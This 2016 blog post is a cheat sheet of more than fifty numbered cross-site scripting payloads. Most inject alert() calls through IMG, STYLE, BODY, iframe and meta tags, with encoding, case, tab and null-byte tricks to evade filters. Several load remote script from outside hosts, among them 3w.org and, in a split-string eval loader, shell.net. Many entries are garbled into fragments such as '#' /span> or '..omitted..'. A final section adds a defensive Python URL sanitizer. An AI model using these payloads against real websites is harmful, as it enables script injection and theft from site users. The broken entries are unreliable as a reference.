XSS attack roundup
Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also with no semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, since there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket and a tag name starting with a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
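The evasion families in items (3) to (19) (mixed case, decimal and hex character references with and without semicolons, embedded tab, newline, carriage return and NUL, leading spaces and control characters) all get past a filter that searches the raw attribute value for `javascript:`. As an added defensive example that is not part of the original post: a Python check that normalizes a URL the way a browser does before it looks at the scheme, allowlists the scheme, and attribute-encodes the accepted value, which also neutralizes the quote breakout of item (6). The function names and the sample inputs are constructed here to model those items.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Browsers drop C0 control characters and spaces around and inside a URL
# scheme, so a filter has to remove them *before* looking for "javascript:".
_CTRL_OR_SPACE = re.compile(r"[\x00-\x20]")
ALLOWED_SCHEMES = {"http", "https", "mailto"}

def normalize_url(value: str) -> str:
    """Approximate the browser's view of a URL before scheme detection."""
    decoded = html.unescape(value)               # &#106; &#0000106 &#x6A -> "j"
    compact = _CTRL_OR_SPACE.sub("", decoded)    # strip NUL, TAB, LF, CR, spaces
    return compact.lower()

def is_safe_url(value: str) -> bool:
    """True if the URL is relative or uses an allowlisted scheme."""
    try:
        scheme = urlsplit(normalize_url(value)).scheme
    except ValueError:                           # e.g. malformed IPv6 netloc
        return False
    return scheme == "" or scheme in ALLOWED_SCHEMES

def safe_src_attribute(value: str) -> Optional[str]:
    """Value ready to place inside src="..."; None means reject it."""
    if not is_safe_url(value):
        return None
    return html.escape(value, quote=True)        # neutralizes " and > breakouts

def _entities(word: str, fmt: str) -> str:
    return "".join(fmt.format(ord(c)) for c in word)

# Constructed samples modelled on the evasion families listed above.
EVASION_SAMPLES = [
    "javascript:alert('XSS')",                                   # (3)
    "JaVaScRiPt:alert('XSS')",                                   # (4)
    _entities("javascript", "&#{};") + ":alert('XSS')",          # (5) with ;
    _entities("javascript", "&#{:07d}") + ":alert('XSS')",       # (8)/(9) no ;
    _entities("javascript", "&#x{:X}") + ":alert('XSS')",        # (10) hex, no ;
    "jav\tascript:alert('XSS')",                                 # (11)
    "jav&#x09;ascript:alert('XSS')",                             # (12)
    "jav&#x0A;ascript:alert('XSS')",                             # (13)
    "jav&#x0D;ascript:alert('XSS')",                             # (14)
    "java\x00script:alert('XSS')",                               # (17)
    " &#14;  javascript:alert('XSS')",                           # (19)
]
```

A protocol-relative value such as the one in item (25) passes this scheme check; restricting which external hosts may be referenced is a separate host allowlist.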